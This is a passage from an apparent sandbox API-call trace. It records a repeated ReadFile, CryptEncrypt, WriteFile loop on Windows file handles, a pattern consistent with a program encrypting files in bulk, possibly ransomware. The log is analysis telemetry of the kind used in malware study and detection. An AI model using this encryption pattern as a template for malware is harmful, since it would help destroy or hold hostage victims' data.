dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.247] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.247] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.247] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.247] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.247] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.247] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.247] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.247] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.247] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.247] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.247] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.248] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.248] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.248] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.248] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.248] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.248] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.248] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.248] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.248] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.248] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.248] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.248] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.248] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.248] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.248] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.248] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.248] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.248] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.249] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.249] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.249] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.249] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.249] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.249] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.249] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.249] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.249] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.249] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.249] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.249] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.249] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.249] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.249] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.249] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.249] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.250] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.250] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.250] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.250] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.250] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.250] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.250] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.250] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.250] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.250] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.250] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.250] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.250] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.250] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.250] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.250] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.250] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.250] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.251] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.251] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.251] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.251] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.251] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.251] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.251] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.251] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.251] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.251] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.251] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.251] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.251] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.251] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.251] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.251] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.252] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.252] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.252] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.252] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.252] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.252] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.252] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.252] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.252] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.252] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.252] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.252] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.252] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.252] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.252] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.252] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.252] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.253] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.253] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.253] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.253] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.253] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.253] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 